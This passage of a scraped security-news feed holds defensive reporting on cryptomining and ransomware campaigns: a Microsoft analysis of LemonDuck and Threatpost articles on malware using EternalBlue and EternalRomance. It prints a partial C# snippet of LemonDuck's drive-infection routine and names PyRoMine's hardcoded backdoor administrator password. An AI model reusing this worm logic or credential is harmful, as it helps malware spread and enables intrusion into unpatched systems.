These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. 
Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. 
**READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mmpc", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MMPC:E537BA51663A720821A67D2A4F7F7F0E", 
"href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-04-25T05:50:11", "description": "The ShadowBrokers\u2019 release of a trove of National Security Agency exploits last year appears to be the gift that keeps on giving, to the hacker community at least: A fresh malware that uses the EternalRomance tool has hit the scene, with Monero-mining as the stated goal. However, more damaging follow-on attacks are likely the endgame.\n\nThe bad code is a Python-based cryptocurrency mining malware, according to Fortinet\u2019s FortiGuard Labs, which first [discovered it](<https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html>) this month. Because the malware uses the EternalRomance exploit, the researchers have given it the snappy name of \u201cPyRoMine.\u201d\n\nThe malware can be downloaded as an executable file compiled with PyInstaller, which is a program that packages code written in Python into stand-alone executables. This means that, conveniently, there is no need to install Python on the machine in order to execute the Python-based PyRoMine. 
Once installed, it sets about silently stealing CPU resources from unwitting victims to aim its proverbial drill bit at uncovering Monero profits.\n\n\u201cWe don\u2019t know for sure how it arrives on a system, but considering that this is the type of malware that needs to be mass distributed, it is safe to assume that it arrives via spam email or drive-by-download,\u201d FortiGuard security researcher Jasper Manuel said in an email interview.\n\nWorryingly, PyRoMine also sets up a hidden default account on the victimized machine with system administrator privileges, using the password \u201cP@ssw0rdf0rme.\u201d It\u2019s likely that this would be used for re-infection and further attacks, according to Manuel.\n\n\u201cIt is fairly likely that future attacks could happen,\u201d he told Threatpost. \u201cAlthough this malware is not a botnet because it doesn\u2019t phone home to report an infection and doesn\u2019t wait for commands, it still sets up an account on the affected machine and enables Remote Desktop Protocol. The attackers could use the same channel to connect to the machine using the created account to do further attacks.\u201d\n\n**Ripe for Spreading**\n\nBased on the earnings that PyRoMine has made to date (only about $650), it hasn\u2019t exactly lived up to its name and caught fire on the propagation front. But that could rapidly change: For one, the choice of Monero indicates that the criminals are looking to cast a wide net, given that the currency offers an important \u201cfeature\u201d that makes it more suitable to the mass market than the more venerable Bitcoin: It relies on a proof-of-work algorithm called CryptoNight, designed for ordinary computers and even mobile phones, rather than for high-end GPUs or the specialized hardware needed for efficient Bitcoin mining. 
Thus, the potential attack surface consists of consumers and businesses alike, globally.\n\nSecondly, cybercriminals have discovered that enterprises and individuals have been pretty slow when it comes to patching the known vulnerabilities that the NSA tools leverage.\n\nThe ShadowBrokers [leaked a whole treasure chest](<https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/>) of hacking tools and zero-day exploits in 2017, attributed to the Equation Group, which is believed to be an arm of the NSA\u2019s Tailored Access Operations unit. They target Windows XP/Vista/8.1/7/10 and Windows Server 2003/2008/2012/2016, taking advantage of a pair of vulnerabilities, CVE-2017-0144 and CVE-2017-0145. Microsoft [patched these very quickly](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>) after the tools were made public.\n\n\u201cThe patch for EternalRomance was released a year ago, but many still don\u2019t think proactive about security,\u201d Manuel told Threatpost. \u201cThe fact that cybercriminals use these exploits tells us that they still profit by using these exploits in their malware.\u201d\n\nAnd finally, EternalRomance is a remote code execution (RCE) exploit that abuses the legacy SMBv1 file-sharing protocol. SMBv1 is typically used only within the local area network of a business, but all too often it\u2019s left exposed to the internet \u2013one of the contributing factors as to why the EternalX attacks WannaCry and NotPetya [were able to spread so widely](<https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/>).\n\n\u201cIn the past, we have seen that these exploits were used by state-sponsored threat actors,\u201d Manuel told us. 
\u201cWithin days of the release, we started seeing these exploits being used by commodity malware like cryptominers and info-stealers to target general victims.\u201d\n\nPyRoMine isn\u2019t the first miner to use the NSA tools: Researchers have discovered malware authors using the EternalBlue exploit in other cryptocurrency mining malware, such as [Adylkuzz](<https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/>), [Smominru](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>) and [WannaMine](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) \u2013 with great success.\n\nManuel added that because the patch rate is clearly low for the leveraged vulnerabilities, he expects commodity malware to continue to use the NSA exploits for some time to come. More concerning, PyRoMine\u2019s backdoor strategy could become a hallmark going forward.\n\n\u201cI think is going to be something that we see much more of in the future as the tools that are being deployed are multi-faceted,\u201d said Chris Roberts, chief security architect at Acalvio, in an emailed comment. \u201cIn this case, it\u2019s not only mining and disabling security services. It\u2019s also adding itself into several account types, opening up RDP (3389) and basically laying the welcome mat out for future attacks. Several of the latest tool sets are coming armed with various payloads that simply have functionality to deploy attacks, harvest for data and also take advantage of lax security and processing time. And, this all comes in a nice, neat package using the simple issue that we (the human) haven\u2019t patched or don\u2019t pay attention to what we are downloading/clicking. 
Once again, we are the attack vector and the computer suffers.\u201d\n", "cvss3": {}, "published": "2018-04-26T18:21:13", "type": "threatpost", "title": "PyRoMine Uses NSA Exploit for Monero Mining and Backdoors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "modified": "2018-04-26T18:21:13", "id": "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "href": "https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:27", "description": "One day after [clear ties were established](<https://threatpost.com/bad-rabbit-linked-to-expetrnot-petya-attacks/128611/>) between the [Bad Rabbit ransomware](<https://threatpost.com/badrabbit-ransomware-attacks-hitting-russia-ukraine/128593/>) attacks and this summer\u2019s NotPetya outbreak, researchers at Cisco today strengthened that bond disclosing that the leaked NSA exploit EternalRomance was used to spread the malware on compromised networks.\n\nThis contradicts earlier reports that neither EternalRomance nor EternalBlue were part of this week\u2019s ransomware attack that was confined primarily to Russia and the Ukraine.\n\nCisco said in an [ongoing analysis of Bad Rabbit](<http://blog.talosintelligence.com/2017/10/bad-rabbit.html>) that the implementation of the EternalRomance exploit used in Bad Rabbit has been modified.\n\n\u201cThis is a different implementation of the EternalRomance exploit,\u201d said Martin Lee, technical lead of security research for Cisco\u2019s research arm, Talos. 
\u201cIt\u2019s different code from what we saw used in NotPetya, but exploiting the same vulnerability in a slightly different implementation.\u201d\n\nEternalRomance is one of a number of Windows exploits [leaked in April by the ShadowBrokers](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>), a still unidentified group that has been [leaking Equation Group exploits](<https://threatpost.com/shadowbrokers-leak-has-strong-connection-to-equation-group/119941/>) for more than a year. Many of those attacks, however, were mitigated in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), a Microsoft security bulletin that included patches for vulnerabilities in the SMBv1 protocol abused by these exploits.\n\nThe publicly available exploits affect older versions of Windows (XP through 7 on the client side and 2003-2008 on Windows Server).\n\nEternalRomance is a remote code execution attack that exploits CVE-2017-0145. What exacerbated the WannaCry and NotPetya attacks was the fact that many organizations had SMBv1 exposed to the internet rather than solely internally. This allowed WannaCry in particular to worm out to the internet and affect machines outside a compromised network.\n\n\u201cThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a type confusion vulnerability leading to an attacker offset controlled arbitrary heap write,\u201d Microsoft said in [an analysis of EternalRomance](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) published in June. 
\u201cAs with almost any heap corruption exploit, the attacker must know or control the layout of the heap to consistently succeed.\u201d\n\nCisco said in its look at Bad Rabbit this week that it found a type confusion attempt similar to EternalRomance.\n\n\u201cWe can be fairly confident that BadRabbit includes an EternalRomance implementation used to overwrite a kernel\u2019s session security context to enable it to launch remote services, while in Nyetya it was used to install the DoublePulsar backdoor,\u201d Cisco said. \u201cBoth actions are possible due to the fact that EternalRomance allows the attacker to read/write arbitrary data into the kernel memory space.\u201d\n\nDoublePulsar is a post-exploitation memory-based kernel payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish. It was part of the Fuzzbunch exploit platform leaked by the Shadowbrokers.\n\n\u201cThis is a full ring0 payload that gives you full control over the system and you can do what you want to it,\u201d said Sean Dillon, senior security analyst at RiskSense. Dillon was the first to reverse-engineer a DoublePulsar payload, and published his [analysis](<https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html>) in April.\n\nResearchers at Kaspersky Lab on Wednesday confirmed the link between Bad Rabbit and NotPetya, finding similarities in the hashing algorithm used in the two attacks, as well as some of the same domains. It also steals credentials by leveraging the Windows utility WMIC.\n\nUnlike NotPetya, Bad Rabbit is not a wiper attack, Kaspersky Lab confirmed today. Cisco\u2019s Lee also confirmed this is not a wiper.\n\n\u201cThe researchers also found that the Bad Rabbit ransomware code doesn\u2019t contain the kind of mistakes that could be used to decrypt victims\u2019 files and data. 
There is no way to decrypt information without the attackers\u2019 private key,\u201d Kaspersky Lab said today. \u201cHaving said that, the experts have found a flaw in the code of dispci.exe, which means that the malware doesn\u2019t wipe the generated password from the memory \u2013 so there is a slim possibility to extract it.\u201d\n\nKaspersky Lab also said that it saw traces of the attack dating back to July starting with the compromise of high-profile media sites in Russia including Interfax. Government agencies in Turkey, including the metro in Kiev and a major airport, were also serving the malware, as were other sites in Turkey, Germany and the U.S.\u2014about 200 in all. The attackers, however, pulled the malicious code once Bad Rabbit was made public.\n\nThe malware was spreading primarily through drive-by downloads where the hacked sites were serving up a phony Flash Player installer that executes a dropper on the compromised machine that reaches out to the attacker\u2019s domain for the rest of the attack. The malware relied on user action to trigger the executable and to grant it excessive permissions through a Windows UAC prompt.\n\nWhile ExPetr was wiper malware in the guise of a ransomware attack, Bad Rabbit installs a malicious executable called dispci.exe which is derived from the free and open source disk encryption software called DiskCryptor.\n\n\u201cThe malware modifies the Master Boot Record (MBR) of the infected system\u2019s hard drive to redirect the boot process into the malware authors code for the purposes of displaying a ransom note,\u201d Cisco said. \u201cThe ransom note that is displayed following the system reboot is very similar to the ransom notes displayed by other ransomware variants, namely Petya, that we have observed in other notable attacks this year.\u201d\n\nThe attackers are demanding 0.05 Bitcoin or $298 USD at today\u2019s exchange rate in exchange for the decryption key that will unlock their hard drives. 
Each victim is assigned a unique payment wallet, simplifying the process for recovery for victims and profit for the attackers.\n", "cvss3": {}, "published": "2017-10-26T13:53:40", "type": "threatpost", "title": "EternalRomance Exploit Found in Bad Rabbit Ransomware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0145"], "modified": "2017-10-26T13:53:40", "id": "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "href": "https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:32", "description": "The crusty SMBv1 file-sharing protocol, abused by a [NSA exploit](<https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/>) last month that spread [WannaCry](<https://threatpost.com/someone-failed-to-contain-wannacry/126335/>), will be removed from Windows 10 starting with the upcoming Redstone 3 update.\n\n\u201cWe can confirm that SMBv1 is being removed for Redstone 3,\u201d a Microsoft representative told Threatpost.\n\nRedstone 3, a code-name for the Fall Creators Update, will begin the phasing out of SMBv1, a plan that reportedly has been in the works for years and is not a reaction to the EternalBlue exploit, nor WannaCry. It is due in September.\n\nSMBv1, short for the Server Message Block protocol, provides shared access to Windows file and print services on a local network. Attackers believed to have [ties to North Korea](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) used the EternalBlue exploit, leaked in April by the ShadowBrokers, to spread the ransomware worldwide on May 12. 
Hospitals in the U.K., giant telecommunications providers across Europe, and many businesses in Russia and across Asia fell victim to WannaCry, which eventually infected unpatched Windows servers running SMBv1 in more than 150 countries.\n\nMicrosoft had [patched the SMBv1 vulnerability](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) in question in March in MS17-010, one month before the ShadowBrokers\u2019 leak, and urged admins worldwide to install the patch immediately. The WannaCry outbreak, however, demonstrated that many organizations did not heed those warnings; the ransomware, generally derided for its shoddy coding, still managed to infect more than 200,000 servers.\n\nThe weaponized version of EternalBlue released by the ShadowBrokers is effective against only Windows 7 and Windows XP machines, but researchers at RiskSense were able to build a [Windows 10 port](<https://threatpost.com/nsas-eternalblue-exploit-ported-to-windows-10/126087/>) that bypasses some of the mitigations in the Current Branch for Business version of the operating system. While a report on RiskSense\u2019s Windows 10 version of the attack is available, researchers won\u2019t release new offsets used to weaponize their attack.\n\nMicrosoft, meanwhile, continues to plead with users running legacy versions of Windows to upgrade to Windows 10. The current version of the operating system includes a number of [mitigations](<https://threatpost.com/windows-10-mitigations-make-future-eternalblue-attacks-difficult/126132/>) to deny EternalBlue and other weapons-grade Windows attacks leaked in April. 
Researchers echo those pleas as well, praising Windows 10\u2019s mitigations such as kernel ASLR and DEP and virtualization-based security in Device Guard.\n\nMicrosoft this week released an [analysis of EternalBlue and EternalRomance](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), another SMB remote code execution attack, and described how each of the above mitigations, in addition to kernel Control Flow Guard, breaks the exploits available in the wild.\n\n\u201cThrough VBS\u2019s usage of CPU hypervisor functionality, Device Guard-enabled systems can verify and enforce integrity of code that\u2019s mapped in the kernel address space,\u201d wrote Viktor Brange of the Windows Offensive Security Research Team. \u201ckCFG prevents many exploitation techniques that rely on corrupting function pointers to achieve code execution.\u201d\n\nWhile EternalBlue and its [DoublePulsar backdoor](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) have been studied on many fronts, EternalRomance is another SMBv1 attack that exploits a separate vulnerability, CVE-2017-0145, to gain remote code execution capabilities.\n\n\u201cThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a type confusion vulnerability leading to an attacker offset controlled arbitrary heap write,\u201d Brange wrote. \u201cAs with almost any heap corruption exploit, the attacker must know or control the layout of the heap to consistently succeed. 
With SMB, most objects are allocated in the non-paged pool.\u201d\n\nIn its analysis, Microsoft explains how an attacker could learn a reliable heap layout, build primitives from corruption of the heap, and how all this enables installation of the in-memory backdoor.\n\nIn addition to patching, Microsoft warns that customers exposing port 445 to the internet are making a massive mistake, and that SMB should be run inside the firewall.\n\n\u201cHowever, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise,\u201d Microsoft said.\n", "cvss3": {}, "published": "2017-06-20T08:41:13", "type": "threatpost", "title": "SMBv1 to be Disabled in Windows Fall Creators Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0145"], "modified": "2017-06-26T19:14:10", "id": "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "href": "https://threatpost.com/say-goodbye-to-smbv1-in-windows-fall-creators-update/126387/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:08", "description": "Criminals behind the Retefe banking Trojan have added a new component to their malware that uses the [NSA exploit EternalBlue](<https://threatpost.com/scanner-shows-eternalblue-vulnerability-unpatched-on-thousands-of-machines/126818/>).\n\nThe update makes Retefe the latest malware family to adopt the SMBv1 attack against a patched Windows vulnerability, and could signal an emerging trend, said researchers at Proofpoint. 
Earlier this year, researchers at Flashpoint observed the TrickBot banking Trojan had added an EternalBlue module as well.\n\nWhile Retefe has never reached the scale or reputation of similar Trojans such as Dridex or Zeus, it is notable for its interesting implementations and consistent regional focus in Austria, Sweden, Switzerland, Japan and more recently the United Kingdom, researchers said.\n\n\u201cUnlike Dridex or other banking Trojans that rely on webinjects to hijack online banking sessions, Retefe operates by routing traffic to and from the targeted banks through various proxy servers, often hosted on the TOR network,\u201d said Proofpoint in a technical post Thursday explaining its [research](<https://www.proofpoint.com/us/threat-insight/post/retefe-banking-trojan-leverages-eternalblue-exploit-swiss-campaigns>).\n\nOver the past several months, researchers have observed a wave of new Retefe campaigns consisting of unsolicited emails containing malicious Microsoft Office documents. Attachments contain embedded Package Shell Objects, or Object Linking and Embedding Objects, that are typically Windows Shortcut \u201c.lnk\u201d files, researchers said.\n\nIf the user opens the shortcut and accepts the security warning that appears, a PowerShell command initiates the download of a self-extracting Zip archive hosted on a remote server. The Zip archive contains an obfuscated JavaScript installer.\n\nWhen researchers de-obfuscated the JavaScript installer they found several configuration session parameters. In recent weeks, researchers said, a \u201cpseb:\u201d parameter has been added which references a script that implements the EternalBlue exploit that can be used to spread laterally within targeted networks.\n\n\u201cWe first observed the \u2018pseb:\u2019 parameter on Sept. 5. 
The \u2018pseb:\u2019 configuration implements the EternalBlue exploit, borrowing most of its code from a publicly available proof-of-concept,\u201d researchers wrote.\n\nProofpoint said the EternalBlue parameter used by the adversary also contains functionality to log the installation and victim configuration details and upload data to an FTP server.\n\nThe payload configuration for this implementation of EternalBlue downloads a PowerShell script from a remote server, which includes an embedded executable that installs Retefe, researchers said.\n\n\u201cWe are observing increasingly targeted attacks from this group, that, with the addition of the EternalBlue exploit, creates opportunities for effective propagation within networks once initial targets have been compromised,\u201d Proofpoint wrote.\n\nResearchers note that on Sept. 20, the \u201cpseb:\u201d section had been replaced with a new \u201cpslog:\u201d section that contained only the EternalBlue logging functions. \u201cThis installation, however, lacks the \u2018pseb:\u2019 module responsible for further lateral spread via EternalBlue, thus avoiding an infinite spreading loop,\u201d they said.\n\nResearchers urge companies to ensure that they are fully patched against the EternalBlue vulnerability ([CVE-2017-0144](<https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>)). 
\u201cCompanies should also block associated traffic in IDS systems and firewalls and block malicious messages (the primary vector for Retefe) at the email gateway,\u201d Proofpoint added.\n", "cvss3": {}, "published": "2017-09-22T14:02:28", "type": "threatpost", "title": "EternalBlue Exploit Used in Retefe Banking Trojan Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0144"], "modified": "2017-09-22T18:02:28", "id": "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "href": "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-19T14:17:35", "description": "The InvisiMole threat group has resurfaced in a new campaign, revealing a new toolset and a strategic collaboration with the [high-profile Gamaredon](<https://threatpost.com/gamaredon-apt-toolset-ukraine/152568/>) advanced persistent threat (APT) group.\n\nInvisiMole was [first uncovered by ESET in 2018](<https://threatpost.com/invisimole-burrows-into-targets-with-rich-espionage-tools/132730/>), with cyberespionage activity dating back to 2013 in operations in Ukraine and Russia. More recently, from late 2019 until at least this month, researchers have spotted the group attacking a few high-profile organizations in the military sector and diplomatic missions, both in Eastern Europe. 
These attacks were \u201chighly targeted,\u201d affecting only a few dozen computers.\n\nThis more recent campaign allowed researchers to find the \u201cmissing pieces of the puzzle\u201d on the group\u2019s latest tactics, techniques and procedures (TTPs), observing the group\u2019s updated, sophisticated toolset being used for the delivery, lateral movement and execution of InvisiMole\u2019s backdoors.\n\n\u201cAfter discovering new activity in late 2019, we gained the opportunity to take a proper look under the hood of InvisiMole\u2019s operations and piece together the hidden parts of the story,\u201d said researchers with ESET in a Thursday analysis, shared at ESET Virtual World 2020. \u201cAnalyzing the group\u2019s updated toolset, we observed continuous development and substantial improvements, with special focus on staying under the radar.\u201d\n\n## **Updated Toolset**\n\nBack when InvisiMole was first uncovered in 2018, researchers documented two backdoors used by the threat group, RC2CL and RC2FM. These two backdoors feature various espionage functionalities, including recording the victim on their webcam and microphone, tracking the geolocation of the victim and collecting recently accessed documents.\n\nThe InvisiMole malware has since been updated with new changes aiming to add stealth to its operations. The updated InvisiMole toolset relies heavily on [\u201cliving off the land\u201d techniques](<https://threatpost.com/linkedin-job-offers-targeted-aerospace-military-firms-with-malware/156614/>), which are used across its four different execution chains, abusing legitimate applications to perform malicious operations while flying under the radar. For instance, the components used by InvisiMole malware are encrypted using a legitimate Windows feature named the Data Protection API, a feature that allows users to protect data in their apps. 
This tactic \u201censures that the payload can only be decrypted and executed on the affected computer, thus protecting it from analysis by security researchers,\u201d said researchers.\n\nThe updated InvisiMole toolset also features a new component that uses [DNS tunneling](<https://threatpost.com/tracking-malware-that-uses-dns-for-exfiltration/111147/>) for stealthier command-and-control (C2) communication. [DNS tunneling](<https://threatpost.com/wekby-apt-gang-using-dns-tunneling-for-command-and-control/118303/>) involves encoding the data of other programs or protocols in DNS queries and responses; often involving data payloads that can be added to an attacked DNS server and used to control a remote server and applications.\n\nResearchers also discovered that InvisiMole uses [NSA exploit EternalBlue](<https://threatpost.com/scanner-shows-eternalblue-vulnerability-unpatched-on-thousands-of-machines/126818/>) and [BlueKeep exploit](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) (CVE-2019-0708 and CVE-2017-0144, respectively) for lateral movement in its victims\u2019 networks.\n\n\u201cIn this recent campaign, the backdoor [uses] added functionality to scan the compromised network for hosts that support the vulnerable SMBv1.0 protocol,\u201d said researchers. \u201cInvisiMole uses this capability to spread in the network via the EternalBlue exploit.\u201d\n\n## **Gamaredon Link**\n\nDuring their investigation, researchers found attempts to deploy the InvisiMole malware using server infrastructure that is known to be used by Gamaredon. 
The Gamaredon APT, which has been active since at least 2013, is responsible for a number of high-profile attacks, including [recent attacks on Ukrainian national security targets](<https://threatpost.com/gamaredon-apt-toolset-ukraine/152568/>).\n\nMore recently, in 2020, [the threat group](<https://threatpost.com/microsoft-outlook-users-targeted-by-gamaredons-new-vba-macro/156484/>) gave its post-compromise toolset a facelift with the addition of a new Visual Basic for Applications (VBA) macro, targeting Microsoft Outlook users. Despite this recent innovation, the tools utilized by Gamaredon have historically been very simple and designed to gather sensitive data from compromised systems.\n\nIn its partnership with InvisiMole, researchers believe that Gamaredon plays a role in initially infiltrating networks of interest (typically via spear-phishing attacks) using these simple tools, and possibly gaining administrative privileges. Then, InvisiMole, whose more advanced tooling requires elevated rights, steps in.\n\n\u201cThis discovery also reveals a previously unreported cooperation between the Gamaredon and InvisiMole groups,\u201d said researchers. \u201cHowever, it should be noted these two groups use different TTPs and have a varying level of sophistication\u2014the Gamaredon group seems to make no effort in trying to stay under the radar, in contrast with the stealthiness of InvisiMole demonstrated in the recent campaign.\u201d\n", "cvss3": {}, "published": "2020-06-18T09:30:00", "type": "threatpost", "title": "InvisiMole Group Resurfaces Touting Fresh Toolset, Gamaredon Partnership", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2019-0708"], "modified": "2020-06-18T09:30:00", "id": "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "href": "https://threatpost.com/invisimole-resurfaces-gamaredon-partnership/156674/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:40:45", "description": "Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.\n\nThe never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an \u201cexhaustive\u201d list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.\n\n\u201cLucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team, on[ Wednesday in a blog post](<https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/>). 
\u201cApplying the updates and patches to the affected software are strongly advised.\u201d\n\nThe vulnerabilities targeted by Lucifer include Rejetto HTTP File Server ([CVE-2014-6287](<https://nvd.nist.gov/vuln/detail/CVE-2014-6287>)), Oracle Weblogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)), ThinkPHP RCE ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), Apache Struts ([CVE-2017-9791](<https://nvd.nist.gov/vuln/detail/CVE-2017-9791>)), Laravel framework ([CVE-2019-9081](<https://nvd.nist.gov/vuln/detail/CVE-2019-9081>)), and Microsoft Windows ([CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>), [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>), and [CVE-2017-8464](<https://nvd.nist.gov/vuln/detail/CVE-2017-8464>)).\n\nAfter successfully exploiting these flaws, the attacker then connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable device, said researchers. These commands include performing a TCP, UDP or HTTP [DoS attack](<https://threatpost.com/massive-ddos-amazon-telecom-infrastructure/150096/>). Other commands allow the malware to drop an [XMRig 